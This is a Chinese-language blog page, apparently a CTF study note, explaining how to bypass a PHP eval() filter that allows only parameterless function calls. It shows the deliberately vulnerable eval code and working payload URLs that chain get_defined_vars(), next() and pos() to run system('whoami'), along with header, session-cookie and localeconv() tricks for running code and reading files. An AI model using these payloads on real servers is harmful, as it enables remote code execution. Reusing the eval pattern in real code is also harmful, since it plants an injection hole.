<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        Y1Daa&#39;s blog
    </title>
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            PHP 无参RCE
        </p>
        <hr>
    </div>
    <div class="post-content">
        <h1 id="无参RCE"><a href="#无参RCE" class="headerlink" title="无参RCE"></a>无参RCE</h1><h2 id="核心代码"><a href="#核心代码" class="headerlink" title="核心代码"></a>核心代码</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>/[^\W]+\((?R)?\)/</code>匹配无参数的函数，函数内部可以无限嵌套同样无参数的函数，将匹配的替换为空，判断剩下的是否只有<code>;</code></p>
<p>即只匹配<code>a(b(c()));</code>这种格式，而不匹配<code>a(&quot;123&quot;)</code>这种格式</p>
<h2 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h2><h3 id="目录操作"><a href="#目录操作" class="headerlink" title="目录操作"></a>目录操作</h3><ul>
<li><code>getchwd()</code> ：返回当前工作目录</li>
<li><code>scandir()</code> ：返回指定目录中的文件和目录的数组</li>
<li><code>dirname()</code> ：返回路径中的目录部分</li>
<li><code>chdir()</code> ：改变当前的目录</li>
</ul>
<h3 id="数组相关的操作"><a href="#数组相关的操作" class="headerlink" title="数组相关的操作"></a>数组相关的操作</h3><ul>
<li><code>end()</code> : 将内部指针指向数组中的最后一个元素，并输出</li>
<li><code>next()</code> : 将内部指针指向数组中的下一个元素，并输出</li>
<li><code>prev()</code> : 将内部指针指向数组中的上一个元素，并输出</li>
<li><code>reset()</code> : 将内部指针指向数组中的第一个元素，并输出</li>
<li><code>each()</code> : 返回当前元素的键名和键值，并将内部指针向前移动</li>
<li><code>array_shift()</code> : 删除数组中第一个元素，并返回被删除元素的值</li>
</ul>
<h3 id="读文件"><a href="#读文件" class="headerlink" title="读文件"></a>读文件</h3><ul>
<li><code>show_source()</code> : 对文件进行语法高亮显示</li>
<li><code>readfile()</code> : 输出一个文件</li>
<li><code>highlight_file()</code> : 对文件进行语法高亮显示</li>
<li><code>file_get_contents()</code> : 把整个文件读入一个字符串中</li>
<li><code>readgzfile()</code> : 可用于读取非 gzip 格式的文件</li>
</ul>
<h2 id="getallheaders"><a href="#getallheaders" class="headerlink" title="getallheaders()"></a><code>getallheaders()</code></h2><p>只能用于Apache，用于获取HTTP所有的头部信息，然后使用<code>var_dump()</code>打印或使用<code>eval()</code>执行</p>
<p>同时在请求包中提交相应代码，具体利用方式如下</p>
<p><img src="/./../../public/img/image-20221011171250597-1666064723275-1-1666064966567-3.png" alt="image-20221011171250597-1666064723275-1"></p>
<h2 id="get-defined-vars"><a href="#get-defined-vars" class="headerlink" title="get_defined_vars()"></a><code>get_defined_vars()</code></h2><p>使用该函数可以获得<code>$_GET</code>、<code>$_POST</code>、<code>$_FILES</code>、<code>$_COOKIE</code>等全局变量的数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(get_defined_vars());</span><br><span class="line"></span><br><span class="line">array(4) &#123; [&quot;_GET&quot;]=&gt; array(1) &#123; [&quot;code&quot;]=&gt; string(29) &quot;var_dump(get_defined_vars());&quot; &#125; [&quot;_POST&quot;]=&gt; array(0) &#123; &#125; [&quot;_COOKIE&quot;]=&gt; array(0) &#123; &#125; [&quot;_FILES&quot;]=&gt; array(0) &#123; &#125; &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(pos(get_defined_vars()));&amp;a=phpinfo();</span><br><span class="line"></span><br><span class="line">array(2) &#123; [&quot;code&quot;]=&gt; string(34) &quot;var_dump(pos(get_defined_vars()));&quot; [&quot;a&quot;]=&gt; string(10) &quot;phpinfo();&quot; &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=var_dump(next(pos(get_defined_vars())));&amp;a=phpinfo();</span><br><span class="line"></span><br><span class="line">string(10) &quot;phpinfo();&quot;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?code=eval(next(pos(get_defined_vars())));&amp;a=system(&#x27;whoami&#x27;);</span><br><span class="line"></span><br><span class="line">www-data</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/">针对$_FILES的方法</a></p>
<h2 id="session-id"><a href="#session-id" class="headerlink" title="session_id()"></a><code>session_id()</code></h2><p>将恶意代码写到cookie的PHPSESSID中，利用该函数进行读取</p>
<p>先将恶意代码进行16进制编码插入到PHPSESSID中，然后使用<code>hex2bin()</code>方法将其转换为字符串</p>
<p>注意：需要先session_start()</p>
<h2 id="使用PHP函数直接读取文件（利用函数构造路径）"><a href="#使用PHP函数直接读取文件（利用函数构造路径）" class="headerlink" title="使用PHP函数直接读取文件（利用函数构造路径）"></a>使用PHP函数直接读取文件（利用函数构造路径）</h2><h3 id="localeconv"><a href="#localeconv" class="headerlink" title="localeconv()"></a><code>localeconv()</code></h3><p>返回一个包含本地数字及货币格式信息的数组，其中返回的二维数组的第一位是一个<code>.</code>，在使用<code>current()</code>等函数将其提取出来，再使用<code>scandir()</code>进行目录遍历</p>
<h3 id="scandir"><a href="#scandir" class="headerlink" title="scandir()"></a><code>scandir()</code></h3><h2 id="相关文章"><a href="#相关文章" class="headerlink" title="相关文章"></a>相关文章</h2><p><a target="_blank" rel="noopener" href="https://blog.51cto.com/u_15057851/4220891">https://blog.51cto.com/u_15057851/4220891</a></p>
<p><a target="_blank" rel="noopener" href="https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/">https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45785288/article/details/109259595?spm=1001.2101.3001.6650.2&amp;utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-2-109259595-blog-115707975.pc_relevant_3mothn_strategy_recovery&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-2-109259595-blog-115707975.pc_relevant_3mothn_strategy_recovery&amp;utm_relevant_index=5">https://blog.csdn.net/weixin_45785288/article/details/109259595?spm=1001.2101.3001.6650.2&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-109259595-blog-115707975.pc_relevant_3mothn_strategy_recovery&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-109259595-blog-115707975.pc_relevant_3mothn_strategy_recovery&amp;utm_relevant_index=5</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_28759987/article/details/116284686">https://blog.csdn.net/weixin_28759987/article/details/116284686</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_54648419/article/details/123690383">https://blog.csdn.net/weixin_54648419/article/details/123690383</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_30568317/article/details/116284685">https://blog.csdn.net/weixin_30568317/article/details/116284685</a></p>

    </div>

    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 <a class="flink" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>-<a class="flink" target="_blank" rel="noopener" href="https://github.com/sanjinhub/hexo-theme-geek">Geek</a>.
        <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label>
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="CmCti21ooOOIzFOhEyFkFvR0-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="FqiyUqbg7McKN2eG0MCewupf">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>
</body>

</html>